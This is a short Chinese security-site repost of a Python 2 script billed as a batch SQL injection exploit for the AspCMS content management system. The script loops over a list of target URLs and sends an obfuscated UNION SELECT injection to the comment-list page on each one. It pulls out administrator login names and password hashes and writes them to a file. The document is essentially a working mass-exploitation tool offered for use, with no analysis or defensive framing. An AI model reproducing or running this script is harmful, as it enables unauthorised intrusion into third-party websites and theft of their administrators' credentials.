Aspcms批量注入Exp

颓废 2019年5月19日10:38:01评论1,089 views字数 1010阅读3分22秒阅读模式
摘要

作者:ADminSS

Aspcms批量注入Exp

作者:ADminSS

#!/use/bin/python # -*- coding: utf-8 -*-   import urllib2 version = ''' +----------------------------------------------------+ +       Hacker By AdminSS    Blog:www.lsafe.org      + +----------------------------------------------------+ ''' print version url = list(open('aspcms.txt')) for c in url:   try:     response = urllib2.urlopen(c.strip('/n')+"/plug/comment/commentList.asp?id=0%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now%28%29,null,1%20%20frmasterom%20{prefix}user",timeout=3)     htmls = response.read()     username = htmls[htmls.find('</span>'):]     password = htmls[htmls.find('<div class="line2">'):]     print "URL :"+c     print "USERNAME:"+username[16:22]     print "PASSWORD:"+password[19:35]     print "---------------------------------"     fileput = open('adminss.txt', 'a')     fileput.write("URL :"+c)     fileput.write("USERNAME :"+username[16:22]+"/n")     fileput.write("PASSWORD :"+password[19:35]+"/n")     fileput.write("-----------------------------------"+"/n")     fileput.close()   except Exception,url:     print "URL :"+c     print str(url)     print "---------------------------------"

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
颓废
  • 本文由 发表于 2019年5月19日10:38:01
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Aspcms批量注入Exphttps://cn-sec.com/archives/68560.html

发表评论

匿名网友 填写信息